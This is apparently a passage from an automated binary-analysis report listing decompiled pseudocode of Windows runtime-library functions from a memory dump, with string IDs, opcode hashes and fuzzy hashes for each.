                                            						_push(_t118 - 0x70);
                                            						_push( *((intOrPtr*)(_t118 - 0x70)));
                                            						_push(_t113);
                                            						_push(4);
                                            						_push(_t118 - 0x78);
                                            						_push(0x6b);
                                            						_t84 = E0126AA90();
                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                            						if(_t84 < 0) {
                                            							goto L29;
                                            						}
                                            						_t110 = 0;
                                            						_t106 = 0;
                                            						while(1) {
                                            							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                            							 *(_t118 - 0x88) = _t106;
                                            							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                            								break;
                                            							}
                                            							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                            							_t106 = _t106 + 1;
                                            						}
                                            						_t88 = E012A500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                            						_t119 = _t119 + 0x1c;
                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                            						if(_t88 < 0) {
                                            							goto L29;
                                            						}
                                            						_t101 = _t118 - 0x3c;
                                            						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                            						goto L21;
                                            					}
                                            					_t67 = 0xc0000017;
                                            					goto L28;
                                            				}
                                            				_push(0);
                                            				_push(0x20);
                                            				_push(_t118 - 0x60);
                                            				_push(0x5a);
                                            				_t94 = E01269860();
                                            				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                            				if(_t94 < 0) {
                                            					goto L29;
                                            				}
                                            				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                            					_t101 = L"Legacy";
                                            					_push(6);
                                            				} else {
                                            					_t101 = L"UEFI";
                                            					_push(4);
                                            				}
                                            				_pop(_t65);
                                            				goto L21;
                                            			}


                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: b4da3115af1245653da0f5f005bf9427aedcd6e8139a813e9f26c4e530c2fe6e
                                            • Instruction ID: e9155f46ee4d17aada7f2aff260bd3a520d1623d50a95b63c52c7f361855792e
                                            • Opcode Fuzzy Hash: b4da3115af1245653da0f5f005bf9427aedcd6e8139a813e9f26c4e530c2fe6e
                                            • Instruction Fuzzy Hash: A2518DB1A206099FDB25DFA8C840BAEBBF8FF88700F54406DE609EB291D6719940CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E0122B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                            				signed int _t65;
                                            				signed short _t69;
                                            				intOrPtr _t70;
                                            				signed short _t85;
                                            				void* _t86;
                                            				signed short _t89;
                                            				signed short _t91;
                                            				intOrPtr _t92;
                                            				intOrPtr _t97;
                                            				intOrPtr* _t98;
                                            				signed short _t99;
                                            				signed short _t101;
                                            				void* _t102;
                                            				char* _t103;
                                            				signed short _t104;
                                            				intOrPtr* _t110;
                                            				void* _t111;
                                            				void* _t114;
                                            				intOrPtr* _t115;
                                            
                                            				_t109 = __esi;
                                            				_t108 = __edi;
                                            				_t106 = __edx;
                                            				_t95 = __ebx;
                                            				_push(0x90);
                                            				_push(0x12ff7a8);
                                            				E0127D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                            				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                            				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                            				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                            				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                            				if(__edx == 0xffffffff) {
                                            					L6:
                                            					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                            					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                            					__eflags = _t65 & 0x00000002;
                                            					if((_t65 & 0x00000002) != 0) {
                                            						L3:
                                            						L4:
                                            						return E0127D130(_t95, _t108, _t109);
                                            					}
                                            					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                            					_t108 = 0;
                                            					_t109 = 0;
                                            					_t95 = 0;
                                            					__eflags = 0;
                                            					while(1) {
                                            						__eflags = _t95 - 0x200;
                                            						if(_t95 >= 0x200) {
                                            							break;
                                            						}
                                            						E0126D000(0x80);
                                            						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                            						_t108 = _t115;
                                            						_t95 = _t95 - 0xffffff80;
                                            						_t17 = _t114 - 4;
                                            						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                            						__eflags =  *_t17;
                                            						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                            						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                            						_t102 = _t110 + 1;
                                            						do {
                                            							_t85 =  *_t110;
                                            							_t110 = _t110 + 1;
                                            							__eflags = _t85;
                                            						} while (_t85 != 0);
                                            						_t111 = _t110 - _t102;
                                            						_t21 = _t95 - 1; // -129
                                            						_t86 = _t21;
                                            						__eflags = _t111 - _t86;
                                            						if(_t111 > _t86) {
                                            							_t111 = _t86;
                                            						}
                                            						E0126F3E0(_t108, _t106, _t111);
                                            						_t115 = _t115 + 0xc;
                                            						_t103 = _t111 + _t108;
                                            						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                            						_t89 = _t95 - _t111;
                                            						__eflags = _t89;
                                            						_push(0);
                                            						if(_t89 == 0) {
                                            							L15:
                                            							_t109 = 0xc000000d;
                                            							goto L16;
                                            						} else {
                                            							__eflags = _t89 - 0x7fffffff;
                                            							if(_t89 <= 0x7fffffff) {
                                            								L16:
                                            								 *(_t114 - 0x94) = _t109;
                                            								__eflags = _t109;
                                            								if(_t109 < 0) {
                                            									__eflags = _t89;
                                            									if(_t89 != 0) {
                                            										 *_t103 = 0;
                                            									}
                                            									L26:
                                            									 *(_t114 - 0xa0) = _t109;
                                            									 *(_t114 - 4) = 0xfffffffe;
                                            									__eflags = _t109;
                                            									if(_t109 >= 0) {
                                            										L31:
                                            										_t98 = _t108;
                                            										_t39 = _t98 + 1; // 0x1
                                            										_t106 = _t39;
                                            										do {
                                            											_t69 =  *_t98;
                                            											_t98 = _t98 + 1;
                                            											__eflags = _t69;
                                            										} while (_t69 != 0);
                                            										_t99 = _t98 - _t106;
                                            										__eflags = _t99;
                                            										L34:
                                            										_t70 =  *[fs:0x30];
                                            										__eflags =  *((char*)(_t70 + 2));
                                            										if( *((char*)(_t70 + 2)) != 0) {
                                            											L40:
                                            											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                            											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                            											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                            											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                            											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                            											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                            											 *(_t114 - 4) = 1;
                                            											_push(_t114 - 0x74);
                                            											L0127DEF0(_t99, _t106);
                                            											 *(_t114 - 4) = 0xfffffffe;
                                            											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                            											goto L3;
                                            										}
                                            										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                            										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                            											goto L40;
                                            										}
                                            										_push( *((intOrPtr*)(_t114 + 8)));
                                            										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                            										_push(_t99 & 0x0000ffff);
                                            										_push(_t108);
                                            										_push(1);
                                            										_t101 = E0126B280();
                                            										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                            										if( *((char*)(_t114 + 0x14)) == 1) {
                                            											__eflags = _t101 - 0x80000003;
                                            											if(_t101 == 0x80000003) {
                                            												E0126B7E0(1);
                                            												_t101 = 0;
                                            												__eflags = 0;
                                            											}
                                            										}
                                            										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                            										goto L4;
                                            									}
                                            									__eflags = _t109 - 0x80000005;
                                            									if(_t109 == 0x80000005) {
                                            										continue;
                                            									}
                                            									break;
                                            								}
                                            								 *(_t114 - 0x90) = 0;
                                            								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                            								_t91 = E0126E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                            								_t115 = _t115 + 0x10;
                                            								_t104 = _t91;
                                            								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                            								__eflags = _t104;
                                            								if(_t104 < 0) {
                                            									L21:
                                            									_t109 = 0x80000005;
                                            									 *(_t114 - 0x90) = 0x80000005;
                                            									L22:
                                            									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                            									L23:
                                            									 *(_t114 - 0x94) = _t109;
                                            									goto L26;
                                            								}
                                            								__eflags = _t104 - _t92;
                                            								if(__eflags > 0) {
                                            									goto L21;
                                            								}
                                            								if(__eflags == 0) {
                                            									goto L22;
                                            								}
                                            								goto L23;
                                            							}
                                            							goto L15;
                                            						}
                                            					}
                                            					__eflags = _t109;
                                            					if(_t109 >= 0) {
                                            						goto L31;
                                            					}
                                            					__eflags = _t109 - 0x80000005;
                                            					if(_t109 != 0x80000005) {
                                            						goto L31;
                                            					}
                                            					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                            					_t38 = _t95 - 1; // -129
                                            					_t99 = _t38;
                                            					goto L34;
                                            				}
                                            				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                            					__eflags = __edx - 0x65;
                                            					if(__edx != 0x65) {
                                            						goto L2;
                                            					}
                                            					goto L6;
                                            				}
                                            				L2:
                                            				_push( *((intOrPtr*)(_t114 + 8)));
                                            				_push(_t106);
                                            				if(E0126A890() != 0) {
                                            					goto L6;
                                            				}
                                            				goto L3;
                                            			}























                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: _vswprintf_s
                                            • String ID:
                                            • API String ID: 677850445-0
                                            • Opcode ID: ebd447c1a2af970188a3fceded70ec1aebd737fabe3e4120c8b8cf874336fb43
                                            • Instruction ID: 3fd2483c510db2474acdd93b8127221424c7dc0ddee83d10062a05d2bd6afc63
                                            • Opcode Fuzzy Hash: ebd447c1a2af970188a3fceded70ec1aebd737fabe3e4120c8b8cf874336fb43
                                            • Instruction Fuzzy Hash: A951D371D3229B8BDF31EF68C845BBEBBB0AF04710F1141A9D959AB2C2D7704981CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E0124B944(signed int* __ecx, char __edx) {
                                            				signed int _v8;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				char _v28;
                                            				signed int _v32;
                                            				char _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				signed int* _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				intOrPtr _v60;
                                            				intOrPtr _v64;
                                            				intOrPtr _v68;
                                            				intOrPtr _v72;
                                            				intOrPtr _v76;
                                            				char _v77;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t65;
                                            				intOrPtr _t67;
                                            				intOrPtr _t68;
                                            				char* _t73;
                                            				intOrPtr _t77;
                                            				intOrPtr _t78;
                                            				signed int _t82;
                                            				intOrPtr _t83;
                                            				void* _t87;
                                            				char _t88;
                                            				intOrPtr* _t89;
                                            				intOrPtr _t91;
                                            				void* _t97;
                                            				intOrPtr _t100;
                                            				void* _t102;
                                            				void* _t107;
                                            				signed int _t108;
                                            				intOrPtr* _t112;
                                            				void* _t113;
                                            				intOrPtr* _t114;
                                            				intOrPtr _t115;
                                            				intOrPtr _t116;
                                            				intOrPtr _t117;
                                            				signed int _t118;
                                            				void* _t130;
                                            
                                            				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                            				_v8 =  *0x131d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                            				_t112 = __ecx;
                                            				_v77 = __edx;
                                            				_v48 = __ecx;
                                            				_v28 = 0;
                                            				_t5 = _t112 + 0xc; // 0x575651ff
                                            				_t105 =  *_t5;
                                            				_v20 = 0;
                                            				_v16 = 0;
                                            				if(_t105 == 0) {
                                            					_t50 = _t112 + 4; // 0x5de58b5b
                                            					_t60 =  *__ecx |  *_t50;
                                            					if(( *__ecx |  *_t50) != 0) {
                                            						 *__ecx = 0;
                                            						__ecx[1] = 0;
                                            						if(E01247D50() != 0) {
                                            							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            						} else {
                                            							_t65 = 0x7ffe0386;
                                            						}
                                            						if( *_t65 != 0) {
                                            							E012F8CD6(_t112);
                                            						}
                                            						_push(0);
                                            						_t52 = _t112 + 0x10; // 0x778df98b
                                            						_push( *_t52);
                                            						_t60 = E01269E20();
                                            					}
                                            					L20:
                                            					_pop(_t107);
                                            					_pop(_t113);
                                            					_pop(_t87);
                                            					return E0126B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                            				}
                                            				_t8 = _t112 + 8; // 0x8b000cc2
                                            				_t67 =  *_t8;
                                            				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                            				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                            				_t108 =  *(_t67 + 0x14);
                                            				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                            				_t105 = 0x2710;
                                            				asm("sbb eax, edi");
                                            				_v44 = _t88;
                                            				_v52 = _t108;
                                            				_t60 = E0126CE00(_t97, _t68, 0x2710, 0);
                                            				_v56 = _t60;
                                            				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                            					L3:
                                            					 *(_t112 + 0x44) = _t60;
                                            					_t105 = _t60 * 0x2710 >> 0x20;
                                            					 *_t112 = _t88;
                                            					 *(_t112 + 4) = _t108;
                                            					_v20 = _t60 * 0x2710;
                                            					_v16 = _t60 * 0x2710 >> 0x20;
                                            					if(_v77 != 0) {
                                            						L16:
                                            						_v36 = _t88;
                                            						_v32 = _t108;
                                            						if(E01247D50() != 0) {
                                            							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            						} else {
                                            							_t73 = 0x7ffe0386;
                                            						}
                                            						if( *_t73 != 0) {
                                            							_t105 = _v40;
                                            							E012F8F6A(_t112, _v40, _t88, _t108);
                                            						}
                                            						_push( &_v28);
                                            						_push(0);
                                            						_push( &_v36);
                                            						_t48 = _t112 + 0x10; // 0x778df98b
                                            						_push( *_t48);
                                            						_t60 = E0126AF60();
                                            						goto L20;
                                            					} else {
                                            						_t89 = 0x7ffe03b0;
                                            						do {
                                            							_t114 = 0x7ffe0010;
                                            							do {
                                            								_t77 =  *0x1318628; // 0x0
                                            								_v68 = _t77;
                                            								_t78 =  *0x131862c; // 0x0
                                            								_v64 = _t78;
                                            								_v72 =  *_t89;
                                            								_v76 =  *((intOrPtr*)(_t89 + 4));
                                            								while(1) {
                                            									_t105 =  *0x7ffe000c;
                                            									_t100 =  *0x7ffe0008;
                                            									if(_t105 ==  *_t114) {
                                            										goto L8;
                                            									}
                                            									asm("pause");
                                            								}
                                            								L8:
                                            								_t89 = 0x7ffe03b0;
                                            								_t115 =  *0x7ffe03b0;
                                            								_t82 =  *0x7FFE03B4;
                                            								_v60 = _t115;
                                            								_t114 = 0x7ffe0010;
                                            								_v56 = _t82;
                                            							} while (_v72 != _t115 || _v76 != _t82);
                                            							_t83 =  *0x1318628; // 0x0
                                            							_t116 =  *0x131862c; // 0x0
                                            							_v76 = _t116;
                                            							_t117 = _v68;
                                            						} while (_t117 != _t83 || _v64 != _v76);
                                            						asm("sbb edx, [esp+0x24]");
                                            						_t102 = _t100 - _v60 - _t117;
                                            						_t112 = _v48;
                                            						_t91 = _v44;
                                            						asm("sbb edx, eax");
                                            						_t130 = _t105 - _v52;
                                            						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                            							_t88 = _t102 - _t91;
                                            							asm("sbb edx, edi");
                                            							_t108 = _t105;
                                            						} else {
                                            							_t88 = 0;
                                            							_t108 = 0;
                                            						}
                                            						goto L16;
                                            					}
                                            				} else {
                                            					if( *(_t112 + 0x44) == _t60) {
                                            						goto L20;
                                            					}
                                            					goto L3;
                                            				}
                                            			}

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0124B9A5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID:
                                            • API String ID: 885266447-0
                                            • Opcode ID: 4517e5398fa8c0014349e4612388f23a0bc47d63351ce0072259420362ccea9c
                                            • Instruction ID: 83193a20c5379856f8fc6f499978f323a8292da92d15ede7e083c05a279dd7e3
                                            • Opcode Fuzzy Hash: 4517e5398fa8c0014349e4612388f23a0bc47d63351ce0072259420362ccea9c
                                            • Instruction Fuzzy Hash: 0D515971A28352CFC729CF2CC48092ABBF9FB88610F14496EEA9587355D770E844CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: PATH
                                            • API String ID: 0-1036084923
                                            • Opcode ID: a87ba103026eae325e6393888865f3dfb7ddbf25a6e5659d7978ff77f781b799
                                            • Instruction ID: 8ed43c1a317dd8aa63010eafc5a42118a744f5138772525c54365d9674a38f91
                                            • Opcode Fuzzy Hash: a87ba103026eae325e6393888865f3dfb7ddbf25a6e5659d7978ff77f781b799
                                            • Instruction Fuzzy Hash: C7C19F71E2021ADFDB69DF98D8D1ABDBBB5FF58700F044019E901BB290EB74A941CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0129BE0F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                            • API String ID: 0-865735534
                                            • Opcode ID: 4cd7f4caa4039da705e7ae2a58dd3d5fe9ffe6a58b40176f207cd017ee99e8d6
                                            • Instruction ID: ba320445b2790e9f3860c1cd00237250dae5893ff9efa625d9518cfc250cc526
                                            • Opcode Fuzzy Hash: 4cd7f4caa4039da705e7ae2a58dd3d5fe9ffe6a58b40176f207cd017ee99e8d6
                                            • Instruction Fuzzy Hash: B1A1F371B20607CBEB65DB6CC590B7AB7A9AF48721F04457DEE46CB680EB70D8418B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Re-Waiting
                                            • API String ID: 0-316354757
                                            • Opcode ID: e64072f47d55e20818058a65cc59533ef25efa891b33649e21ec3f5e87b9ed53
                                            • Instruction ID: 4ba89746440f6a7de808f22744b4610469d6c8946427582cf107d89af9140ba1
                                            • Opcode Fuzzy Hash: e64072f47d55e20818058a65cc59533ef25efa891b33649e21ec3f5e87b9ed53
                                            • Instruction Fuzzy Hash: BC615731A34616EFEB32DF6CC980B7FBBA5EB44314F140669DA21972C1CB75A940C781
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: `
                                            • API String ID: 0-2679148245
                                            • Opcode ID: 53e61da4ca01048f23357589e6d601e55b346f36b7edfa55f6a6abafea81f5eb
                                            • Instruction ID: 871696954aee789276d2e064c0c1caa5409b7e56e66ab2655d1cdd6b86aa7e16
                                            • Opcode Fuzzy Hash: 53e61da4ca01048f23357589e6d601e55b346f36b7edfa55f6a6abafea81f5eb
                                            • Instruction Fuzzy Hash: 0D518F713243429FD725DF18D984B2BBBE5EB84704F440A2CFA9697291D670E805CB66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                            • Instruction ID: 8651616b63e3ebf16ce2d242988ee1af3ce012db820a767f26c8d365ab3f6a3f
                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                            • Instruction Fuzzy Hash: 4C518B71514711AFC320DF29C841A6BBBF8FF48750F00892EFA9597690E7B4E954CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: 5173a04258be996e23b75a90dfef17403cc24d522b7f19afe91baf2d4c6826b6
                                            • Instruction ID: 965b1bf2bd3d2eff49171583a6fe55b60fc823a38557773294fd7f5a253fd6c0
                                            • Opcode Fuzzy Hash: 5173a04258be996e23b75a90dfef17403cc24d522b7f19afe91baf2d4c6826b6
                                            • Instruction Fuzzy Hash: 464131B2D1052D9FDF21DA50DC80FEEB77CAB54714F4045A5EB09AB280DB309E888F98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: `
                                            • API String ID: 0-2679148245
                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                            • Instruction ID: 319088c1b274442a029b837c397879f8bd6686c6ff4c921aa507cc8f2cb1802b
                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                            • Instruction Fuzzy Hash: E4310232210346AFE710DE29CD85FAABBDAAB84754F144238FB559B2C1D770E904C795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryName
                                            • API String ID: 0-215506332
                                            • Opcode ID: 242afd4dd3765ede00345e3bca7e1c7dadb02c59d4bb2ef9eeb1512701d93eb7
                                            • Instruction ID: b7a597d496467decd40ec43765c017c6549eea5e43f53fafa78341b55f52e3e4
                                            • Opcode Fuzzy Hash: 242afd4dd3765ede00345e3bca7e1c7dadb02c59d4bb2ef9eeb1512701d93eb7
                                            • Instruction Fuzzy Hash: E3312232D2060BAFEB16DA58C945E7FFB78FF80B20F414169EA14A7280D7309E04C7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 70d3a10b7ef64412779dd7a4034649505ad16b0795058c2b2f8f7f4eb341989a
                                            • Instruction ID: 5b0efd101a2ea30c11a7c428f32b42acaf6b3ebd9ff60dc7b1106157b7ea8a9a
                                            • Opcode Fuzzy Hash: 70d3a10b7ef64412779dd7a4034649505ad16b0795058c2b2f8f7f4eb341989a
                                            • Instruction Fuzzy Hash: 2A31E2B156830AEFC751DF68C8C1A6BBBE8FB85654F00092EFA9483251D634DD04CF92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: WindowsExcludedProcs
                                            • API String ID: 0-3583428290
                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                            • Instruction ID: 87cbd1c25696e2f415d249c1440a14205434558f1641ab7c67133b3305101190
                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                            • Instruction Fuzzy Hash: 90210AB653221AABDB22AA59C840F6B7B6DEF90A50F154825FF149B200D634DC11D7B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Actx
                                            • API String ID: 0-89312691
                                            • Opcode ID: 8ecbffee962f2d63c21a2088517c7fbc20a4685db4694f3ba994e466403cff3b
                                            • Instruction ID: f5da9be827c8e4973b04e86425294a44a704ab78a55e5405f5d9283700880acb
                                            • Opcode Fuzzy Hash: 8ecbffee962f2d63c21a2088517c7fbc20a4685db4694f3ba994e466403cff3b
                                            • Instruction Fuzzy Hash: 2111E2347747038BFB2DCE1C8B917367696ABC5624F24452AE661CB792DBBCC801C740
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • Critical error detected %lx, xrefs: 012D8E21
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Critical error detected %lx
                                            • API String ID: 0-802127002
                                            • Opcode ID: 2e8941156202d1fec343d1f3dc55d2ef9962fc4d7e3d59d51e7da4f0c566069e
                                            • Instruction ID: c7c80373ae8c8d7991def836d1803e597609f16218c44fbe90d625d8bc43ad1c
                                            • Opcode Fuzzy Hash: 2e8941156202d1fec343d1f3dc55d2ef9962fc4d7e3d59d51e7da4f0c566069e
                                            • Instruction Fuzzy Hash: 2E113571D24349DBDF2ADFA8C5067ADBBB0AB19314F20425EE569AB282C3744602CF14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 012BFF60
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                            • API String ID: 0-1911121157
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ce66edd57540c1dc64710ded97bd66750233cbe6b807e8134dec8a7fb07adec
                                            • Instruction ID: 119d80b19fc4ad135051d8215223f4e893a92a44b03e71af94254506b341458a
                                            • Opcode Fuzzy Hash: 0ce66edd57540c1dc64710ded97bd66750233cbe6b807e8134dec8a7fb07adec
                                            • Instruction Fuzzy Hash: 5D42597592022A8FDB24CF68C881BA9FBB1FF45704F1481AEDA4DAB242D7749985CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd385b7d4b88e9c09d50066e7686e6bfd7d1d7266b70732000ab10dac9f86dbe
                                            • Instruction ID: 9c71c67c4482e696aea25a3c80fa3f7adbf2f6a40dcdf92e4ce94f9220743f35
                                            • Opcode Fuzzy Hash: fd385b7d4b88e9c09d50066e7686e6bfd7d1d7266b70732000ab10dac9f86dbe
                                            • Instruction Fuzzy Hash: 63F191706282528FD728EF18C481B7ABBE1FF98714F15492EF586CB291E774D881CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 530f03e64fd10503da6c3eda2b0f58696183f93f87b23219ee68053177aed98d
                                            • Instruction ID: c4e3f48e81ccccfc7705be97acd68c5bab906c924a5b694cb1655ccd84ebde03
